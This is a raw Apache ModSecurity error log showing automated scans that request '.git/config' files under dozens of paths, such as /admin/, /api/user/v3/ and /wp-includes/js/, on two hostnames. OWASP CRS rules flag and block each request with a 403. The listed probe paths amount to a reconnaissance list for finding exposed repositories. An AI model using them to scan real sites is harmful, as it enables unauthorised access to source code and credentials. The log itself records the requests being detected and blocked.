[Thu May 23 21:50:59.230417 2024] [:error] [pid 3413211] [client 104.234.204.32:46010] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "Zk-eI_WGyBPySR9VLpy1mAAAAAE"]
[Thu May 23 21:50:59.230800 2024] [:error] [pid 3413211] [client 104.234.204.32:46010] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "Zk-eI_WGyBPySR9VLpy1mAAAAAE"]
[Thu May 23 21:50:59.234402 2024] [:error] [pid 3413433] [client 104.234.204.32:46020] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-includes/js/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-includes/js/.git/config"] [unique_id "Zk-eIzaPQQ881d8bAu5nSAAAAAY"]
[Thu May 23 21:50:59.234918 2024] [:error] [pid 3413433] [client 104.234.204.32:46020] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-includes/js/.git/config"] [unique_id "Zk-eIzaPQQ881d8bAu5nSAAAAAY"]
[Thu May 23 21:50:59.235298 2024] [:error] [pid 3413433] [client 104.234.204.32:46020] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-includes/js/.git/config"] [unique_id "Zk-eIzaPQQ881d8bAu5nSAAAAAY"]
[Thu May 23 21:50:59.252073 2024] [:error] [pid 3431457] [client 104.234.204.32:46034] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /www/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "Zk-eI8DLXjxS3Q8qbGS2lQAAAAk"]
[Thu May 23 21:50:59.252388 2024] [:error] [pid 3431457] [client 104.234.204.32:46034] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "Zk-eI8DLXjxS3Q8qbGS2lQAAAAk"]
[Thu May 23 21:50:59.252677 2024] [:error] [pid 3431457] [client 104.234.204.32:46034] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.git/config"] [unique_id "Zk-eI8DLXjxS3Q8qbGS2lQAAAAk"]
[Thu May 23 21:50:59.256015 2024] [:error] [pid 3414898] [client 104.234.204.32:46038] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /__macosx/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/__MACOSX/.git/config"] [unique_id "Zk-eI9PWiUkCMq8Nf8lwsQAAAAg"]
[Thu May 23 21:50:59.256575 2024] [:error] [pid 3414898] [client 104.234.204.32:46038] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/__MACOSX/.git/config"] [unique_id "Zk-eI9PWiUkCMq8Nf8lwsQAAAAg"]
[Thu May 23 21:50:59.256990 2024] [:error] [pid 3414898] [client 104.234.204.32:46038] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/__MACOSX/.git/config"] [unique_id "Zk-eI9PWiUkCMq8Nf8lwsQAAAAg"]
[Fri May 24 12:48:29.134633 2024] [:error] [pid 3439795] [client 91.215.85.43:50250] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /amphtml/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "ZlBwfWxChojRwFblBeOgdwAAAAg"]
[Fri May 24 12:48:29.135268 2024] [:error] [pid 3439795] [client 91.215.85.43:50250] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "ZlBwfWxChojRwFblBeOgdwAAAAg"]
[Fri May 24 12:48:29.135718 2024] [:error] [pid 3439795] [client 91.215.85.43:50250] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/amphtml/.git/config"] [unique_id "ZlBwfWxChojRwFblBeOgdwAAAAg"]
[Fri May 24 12:48:29.145246 2024] [:error] [pid 3435528] [client 91.215.85.43:50258] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "ZlBwfSKXiBXbyjJPtTG5cgAAAAA"]
[Fri May 24 12:48:29.145487 2024] [:error] [pid 3435528] [client 91.215.85.43:50258] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "ZlBwfSKXiBXbyjJPtTG5cgAAAAA"]
[Fri May 24 12:48:29.145626 2024] [:error] [pid 3435528] [client 91.215.85.43:50258] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v3/.git/config"] [unique_id "ZlBwfSKXiBXbyjJPtTG5cgAAAAA"]
[Fri May 24 12:48:29.147629 2024] [:error] [pid 3439796] [client 91.215.85.43:50268] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "ZlBwfSfcSRnYInexrFNgDwAAAAk"]
[Fri May 24 12:48:29.147870 2024] [:error] [pid 3439796] [client 91.215.85.43:50268] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "ZlBwfSfcSRnYInexrFNgDwAAAAk"]
[Fri May 24 12:48:29.148061 2024] [:error] [pid 3439796] [client 91.215.85.43:50268] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v3/.git/config"] [unique_id "ZlBwfSfcSRnYInexrFNgDwAAAAk"]
[Fri May 24 12:48:29.179710 2024] [:error] [pid 3435532] [client 91.215.85.43:50278] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /aomanalyzer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "ZlBwfdUl7PBHIV1DJKGhbAAAAAQ"]
[Fri May 24 12:48:29.180230 2024] [:error] [pid 3435532] [client 91.215.85.43:50278] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "ZlBwfdUl7PBHIV1DJKGhbAAAAAQ"]
[Fri May 24 12:48:29.180635 2024] [:error] [pid 3435532] [client 91.215.85.43:50278] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/aomanalyzer/.git/config"] [unique_id "ZlBwfdUl7PBHIV1DJKGhbAAAAAQ"]
[Fri May 24 12:48:29.244352 2024] [:error] [pid 3439794] [client 91.215.85.43:50286] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /a/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "ZlBwfQFQDxLtnTYBn1LaAwAAAAc"]
[Fri May 24 12:48:29.248862 2024] [:error] [pid 3435529] [client 91.215.85.43:50282] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "ZlBwfa-u5r0WigdfmiwMGAAAAAE"]
[Fri May 24 12:48:29.249667 2024] [:error] [pid 3435529] [client 91.215.85.43:50282] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "ZlBwfa-u5r0WigdfmiwMGAAAAAE"]
[Fri May 24 12:48:29.250016 2024] [:error] [pid 3435533] [client 91.215.85.43:50302] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/admin/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "ZlBwfQFOO8jRsTgGYPWj_gAAAAU"]
[Fri May 24 12:48:29.250030 2024] [:error] [pid 3435529] [client 91.215.85.43:50282] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v4/.git/config"] [unique_id "ZlBwfa-u5r0WigdfmiwMGAAAAAE"]
[Fri May 24 12:48:29.250317 2024] [:error] [pid 3435533] [client 91.215.85.43:50302] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "ZlBwfQFOO8jRsTgGYPWj_gAAAAU"]
[Fri May 24 12:48:29.250532 2024] [:error] [pid 3435533] [client 91.215.85.43:50302] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/admin/v2/.git/config"] [unique_id "ZlBwfQFOO8jRsTgGYPWj_gAAAAU"]
[Fri May 24 12:48:29.251156 2024] [:error] [pid 3439794] [client 91.215.85.43:50286] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "ZlBwfQFQDxLtnTYBn1LaAwAAAAc"]
[Fri May 24 12:48:29.251166 2024] [:error] [pid 3435531] [client 91.215.85.43:50292] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /alpha/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "ZlBwfeuJfDfP1XOJUImQJgAAAAM"]
[Fri May 24 12:48:29.251357 2024] [:error] [pid 3439794] [client 91.215.85.43:50286] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/a/.git/config"] [unique_id "ZlBwfQFQDxLtnTYBn1LaAwAAAAc"]
[Fri May 24 12:48:29.251659 2024] [:error] [pid 3435531] [client 91.215.85.43:50292] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "ZlBwfeuJfDfP1XOJUImQJgAAAAM"]
[Fri May 24 12:48:29.252015 2024] [:error] [pid 3435531] [client 91.215.85.43:50292] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/alpha/.git/config"] [unique_id "ZlBwfeuJfDfP1XOJUImQJgAAAAM"]
[Fri May 24 12:48:29.352324 2024] [:error] [pid 3435530] [client 91.215.85.43:50308] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/user/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "ZlBwfTuO8Kiuun1sMFoVowAAAAI"]
[Fri May 24 12:48:29.353331 2024] [:error] [pid 3435530] [client 91.215.85.43:50308] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "ZlBwfTuO8Kiuun1sMFoVowAAAAI"]
[Fri May 24 12:48:29.353772 2024] [:error] [pid 3435530] [client 91.215.85.43:50308] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/user/v2/.git/config"] [unique_id "ZlBwfTuO8Kiuun1sMFoVowAAAAI"]
[Fri May 24 12:48:29.355592 2024] [:error] [pid 3435645] [client 91.215.85.43:50340] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /admin/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "ZlBwfZuF_OA4eW7yvNbAFQAAAAY"]
[Fri May 24 12:48:29.356037 2024] [:error] [pid 3435645] [client 91.215.85.43:50340] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.git/config"] [unique_id "ZlBwfZuF_OA4eW7yvNbAFQAAAAY"]
